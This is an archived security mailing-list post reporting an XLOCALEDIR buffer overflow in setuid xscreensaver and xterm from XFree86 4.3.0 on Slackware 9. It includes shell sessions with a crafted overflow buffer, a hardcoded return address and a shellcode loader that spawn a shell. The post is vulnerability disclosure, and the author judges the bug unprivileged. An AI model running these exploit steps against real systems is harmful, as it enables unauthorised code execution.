| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: b0fnet at yahoo.com (b0f) Subject: xfree86 latest version BUG not vuln. Hello, To make it clear I consider this to be a BUG in the code And not a vuln, But I still feel it should be fixed, any Shell from suid binaries is not good. While playing around with xterm and xscreensaver which are both setuid on Slack 9. I came across a bug in the XLOCALEDIR env variable. There was a vuln back in January 2003 in the XLOCALEDIR env variable, An exploit for this can be viewed here… http://www.securiteam.com/exploits/5OP02209FO.html This was fixed in Xfree86 4.2.1, slack 9 uses Xfree86 4.3.0 by default. By using the same technique that this exploit uses but by adding some Extra args like ‘–font a’ or ‘–t 0’ this will still cause these binaries to Overflow and overwrite eip. Here is an example of this. toor@bob:/var/tmp/...$ ls -alF /usr/X11R6/bin/xscreensaver -rwsr-xr-x 1 root bin 210544 Mar 7 20:59 /usr/X11R6/bin/xscreensaver* toor@bob:/var/tmp/...$ export XLOCALEDIR=`perl -e 'print "A"x4500'` toor@bob:/var/tmp/...$ /usr/X11R6/bin/xscreensaver -t 0 xscreensaver: warning: $DISPLAY is not set: defaulting to ":0.0". Segmentation fault toor@bob:/var/tmp/...$ cat /etc/slackware-version Slackware 9.0.0 toor@bob:/var/tmp/...$ uname -a Linux bob 2.4.20 #2 Mon Mar 17 22:02:15 PST 2003 i686 unknown toor@bob:/var/tmp/...$ Or to execute a shell.. b0f@b0f:/tmp$ ./es EggShell loaded into enviroment b0f@b0f:/tmp$ export XLOCALEDIR=`perl -e 'print "A"x2052'``printf "\x64\xfa\xff\xbf"``perl -e 'print "B"x34'``perl -e 'print "A"x1992'` b0f@b0f:/tmp$ /usr/X11R6/bin/xscreensaver -t 0 xscreensaver: couldn't get password of "b0f" xscreensaver: warning: $DISPLAY is not set: defaulting to ":0.0". sh-2.05a$ exit xtrem seems to only overflow when effective and real uid is the same. The way the buffer was built is kind of weird it overwrites eip after a buffer Of 2052 but it also needs more data after that for it to overflow that’s why I have another buffer of 2026 after the return address. So you control eip Round about the middle of the buffer. It seems that where the overflow happens it is not privileged there will be loads More apps that can be overflowed with XLOCALEDIR in this way. I can’t see Any way possible to get higher privs from it. Xfree86.org knows about this bug But have not yet fixed it due to the fact they don’t see it as a security problem. I Haven’t looked at the code to see what causes the overflow. Thought I would post this info to see if anyone can put it to any use? Would be great full of any comments or suggestions. Regards b0f (Alan M) b0fnet@...oo.com www.b0f.net __________________________________ Do you Yahoo!? Yahoo! SiteBuilder - Free, easy-to-use web site design software http://sitebuilder.yahoo.com
Powered by blists - more mailing lists